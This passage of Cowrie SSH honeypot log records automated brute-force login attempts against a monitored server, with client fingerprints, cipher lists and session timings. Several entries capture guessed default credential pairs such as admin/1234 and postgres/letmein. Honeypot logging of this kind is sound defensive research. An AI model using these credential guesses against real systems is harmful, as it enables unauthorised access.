c-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:48:37.281014Z","src_ip":"212.227.235.229","session":"f2499b893bf2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55766,"dst_ip":"1.2.3.4","dst_port":22,"session":"eee877b0df9b","protocol":"ssh","message":"New connection: 212.227.125.160:55766 (1.2.3.4:22) [session: eee877b0df9b]","sensor":"my-vps","timestamp":"2025-08-31T04:48:39.351942Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:48:39.352880Z","src_ip":"212.227.125.160","session":"eee877b0df9b"}
{"eventid":"cowrie.login.failed","username":"software","password":"software","message":"login attempt [software/software] failed","sensor":"my-vps","timestamp":"2025-08-31T04:48:39.444015Z","src_ip":"212.227.235.229","session":"f2499b893bf2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:48:39.544860Z","src_ip":"212.227.125.160","session":"eee877b0df9b"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"tomcat","message":"login attempt [tomcat/tomcat] failed","sensor":"my-vps","timestamp":"2025-08-31T04:48:40.122172Z","src_ip":"212.227.125.160","session":"eee877b0df9b"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:48:41.315426Z","src_ip":"212.227.125.160","session":"eee877b0df9b"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:48:41.637839Z","src_ip":"212.227.235.229","session":"f2499b893bf2"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"tomcat123","message":"login attempt [tomcat/tomcat123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:48:43.850302Z","src_ip":"212.227.235.229","session":"c5c39f7b9774"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55808,"dst_ip":"1.2.3.4","dst_port":22,"session":"9ab29d309182","protocol":"ssh","message":"New connection: 212.227.125.160:55808 (1.2.3.4:22) [session: 9ab29d309182]","sensor":"my-vps","timestamp":"2025-08-31T04:48:44.695662Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:48:44.696863Z","src_ip":"212.227.125.160","session":"9ab29d309182"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:48:44.880668Z","src_ip":"212.227.125.160","session":"9ab29d309182"}
{"eventid":"cowrie.login.failed","username":"gitlab","password":"gitlab123","message":"login attempt [gitlab/gitlab123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:48:45.432194Z","src_ip":"212.227.125.160","session":"9ab29d309182"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:48:46.618214Z","src_ip":"212.227.125.160","session":"9ab29d309182"}
{"eventid":"cowrie.session.closed","duration":"37.7","message":"Connection lost after 37.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:48:48.149362Z","src_ip":"212.227.235.229","session":"c5c39f7b9774"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38548,"dst_ip":"1.2.3.4","dst_port":22,"session":"4e9a41b6b611","protocol":"ssh","message":"New connection: 212.227.125.160:38548 (1.2.3.4:22) [session: 4e9a41b6b611]","sensor":"my-vps","timestamp":"2025-08-31T04:48:51.017488Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56694,"dst_ip":"1.2.3.4","dst_port":22,"session":"6c83db55f980","protocol":"ssh","message":"New connection: 212.227.235.229:56694 (1.2.3.4:22) [session: 6c83db55f980]","sensor":"my-vps","timestamp":"2025-08-31T04:48:54.117472Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:48:54.147142Z","src_ip":"212.227.235.229","session":"6c83db55f980"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:48:54.376434Z","src_ip":"212.227.235.229","session":"6c83db55f980"}
{"eventid":"cowrie.login.failed","username":"george","password":"george","message":"login attempt [george/george] failed","sensor":"my-vps","timestamp":"2025-08-31T04:48:56.123837Z","src_ip":"212.227.235.229","session":"6c83db55f980"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37958,"dst_ip":"1.2.3.4","dst_port":22,"session":"553af98808a3","protocol":"ssh","message":"New connection: 212.227.235.229:37958 (1.2.3.4:22) [session: 553af98808a3]","sensor":"my-vps","timestamp":"2025-08-31T04:48:56.665770Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36396,"dst_ip":"1.2.3.4","dst_port":22,"session":"7547b25e441b","protocol":"ssh","message":"New connection: 212.227.235.229:36396 (1.2.3.4:22) [session: 7547b25e441b]","sensor":"my-vps","timestamp":"2025-08-31T04:48:56.927064Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:48:56.928082Z","src_ip":"212.227.235.229","session":"7547b25e441b"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:48:57.422036Z","src_ip":"212.227.235.229","session":"553af98808a3"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:48:57.422735Z","src_ip":"212.227.235.229","session":"553af98808a3"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:48:57.460481Z","src_ip":"212.227.235.229","session":"7547b25e441b"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:48:57.839773Z","src_ip":"212.227.235.229","session":"6c83db55f980"}
{"eventid":"cowrie.login.failed","username":"admin","password":"andrew","message":"login attempt [admin/andrew] failed","sensor":"my-vps","timestamp":"2025-08-31T04:48:59.089674Z","src_ip":"212.227.235.229","session":"7547b25e441b"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:49:00.361611Z","src_ip":"212.227.235.229","session":"7547b25e441b"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:49:02.124816Z","src_ip":"212.227.125.160","session":"4e9a41b6b611"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:49:02.128399Z","src_ip":"212.227.125.160","session":"4e9a41b6b611"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"letmein","message":"login attempt [postgres/letmein] failed","sensor":"my-vps","timestamp":"2025-08-31T04:49:03.667181Z","src_ip":"212.227.235.229","session":"553af98808a3"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:49:05.413949Z","src_ip":"212.227.235.229","session":"553af98808a3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51530,"dst_ip":"1.2.3.4","dst_port":22,"session":"876970644a89","protocol":"ssh","message":"New connection: 212.227.125.160:51530 (1.2.3.4:22) [session: 876970644a89]","sensor":"my-vps","timestamp":"2025-08-31T04:49:05.980091Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:49:05.981256Z","src_ip":"212.227.125.160","session":"876970644a89"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:49:06.170394Z","src_ip":"212.227.125.160","session":"876970644a89"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1234","message":"login attempt [admin/1234] failed","sensor":"my-vps","timestamp":"2025-08-31T04:49:06.739632Z","src_ip":"212.227.125.160","session":"876970644a89"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:49:07.932110Z","src_ip":"212.227.125.160","session":"876970644a89"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":30974,"dst_ip":"1.2.3.4","dst_port":22,"session":"54610d1c79a3","protocol":"ssh","message":"New connection: 212.227.235.229:30974 (1.2.3.4:22) [session: 54610d1c79a3]","sensor":"my-vps","timestamp":"2025-08-31T04:49:12.241494Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T04:49:12.242442Z","src_ip":"212.227.235.229","session":"54610d1c79a3"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T04:49:12.370362Z","src_ip":"212.227.235.229","session":"54610d1c79a3"}
{"eventid":"cowrie.login.failed","username":"yue","password":"yue","message":"login attempt [yue/yue] failed","sensor":"my-vps","timestamp":"2025-08-31T04:49:12.961722Z","src_ip":"212.227.235.229","session":"54610d1c79a3"}
{"eventid":"cowrie.login.failed","username":"yue","password":"abc123","message":"login attempt [yue/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:49:14.093070Z","src_ip":"212.227.235.229","session":"54610d1c79a3"}
{"eventid":"cowrie.login.failed","username":"yue","password":"abcd123","message":"login attempt [yue/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:49:15.223339Z","src_ip":"212.227.235.229","session":"54610d1c79a3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34662,"dst_ip":"1.2.3.4","dst_port":22,"session":"50be40ee71ed","protocol":"ssh","message":"New connection: 212.227.235.229:34662 (1.2.3.4:22) [session: 50be40ee71ed]","sensor":"my-vps","timestamp":"2025-08-31T04:49:15.997121Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:49:16.063209Z","src_ip":"212.227.235.229","session":"50be40ee71ed"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.